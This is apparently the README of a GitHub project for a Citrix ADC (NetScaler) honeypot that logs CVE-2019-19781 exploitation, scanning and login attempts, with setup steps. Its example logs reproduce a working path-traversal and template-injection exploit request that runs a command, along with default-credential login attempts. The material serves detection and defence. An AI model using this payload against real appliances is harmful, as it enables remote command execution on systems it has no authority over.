Skip to content

Citrix ADC (NetScaler) Honeypot. Supports detection for CVE-2019-19781 and login attempts

License

Notifications You must be signed in to change notification settings

haxrob/citrix-honeypot

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

18 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Citrix ADC (NetScaler) Honeypot

  • Detects and logs payloads for CVE-2019-19781 (Shitrix / Citrixmash)
  • Logs failed login attempts
  • Serves content and headers taken from real appliance in order to increase chance of indexing on search engines (e.g. google, shodan etc.)

screenshot

Installation

Precompiled

Precompiled Linux (x64) package available here

mkdir citrix-honeypot
cd citrix-honeypot
wget https://github.com/x1sec/citrix-honeypot/releases/download/v0.02/citrix-honeypot-linux-amd64.tar.gz
tar -xf citrix-honeypot-linux-amd64.tar.gz

go get

If you have a Go environment ready to go:

go get github.com/x1sec/citrix-honeypot

Running

Generate self signed certificate:

openssl genrsa -out server.key 2048
openssl ecparam -genkey -name secp384r1 -out server.key
openssl req -new -x509 -sha256 -key server.key -out server.crt -days 3650

It's easy as:

./citrix-honeypot

The honeypot will listen on both port 80 and 443 (so it must be run as root user)

Or to detach and run as a background process:

nohup ./citrix-honeypot &

Logs

Results / data is written to the ./log directory. They are:

hits.log - Scanning attempts and exploitation attempts with all data (e.g. headers, post body)

all.log - All HTTP requests that are observed hitting the server

logins.log - Attempted logins to the web interface

tlsErrors.log - Often internet scanners will send invalid data to port 443. HTTPS errors are logged here.

Examples

Running the first public released exploit:

$ cat logs/hits.log 
2020/01/23 08:27:55 
-------------------
Exploitation detected ...
src: xxx.xxx.xxx.xxx
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/2.0
Host: xxx.xxx.xxx.xxx
Accept: */*
Content-Length: 181
Content-Type: application/x-www-form-urlencoded
Nsc_nonce: test1337
Nsc_user: /../../../../../../../../../../netscaler/portal/templates/zToMJRAzp0T0FuUS2cEp41ZZbmrtmUqS
User-Agent: curl/7.67.0

url=http://example.com\&title=[%25+template.new({'BLOCK'%3d'exec(\'id | tee /netscaler/portal/templates/zToMJRAzp0T0FuUS2cEp41ZZbmrtmUqS.xml\')%3b'})+%25]\&desc=test\&UI_inuse=RfWeb

Scanning attempt:

$ cat logs/hits.log 
2020/01/23 08:41:02 
-------------------
Scanning detected ... 
src: xxx.xxx.xxx.xxx
GET /vpn/../vpns/cfg/smb.conf HTTP/2.0
Host: xxx.xxx.xxx.xxx
Accept: */*
User-Agent: curl/7.67.0

Login attempts:

$ cat logs/logins.log
2020/01/23 07:26:03 Failed login from xxx.xxx.xxx.xxx user:nsroot pass:nsroot
2020/01/23 08:26:03 Failed login from xxx.xxx.xxx.xxx user:admin pass:admin

About

Citrix ADC (NetScaler) Honeypot. Supports detection for CVE-2019-19781 and login attempts

Topics

Resources

License

Stars

Watchers

Forks

Packages

No packages published

Languages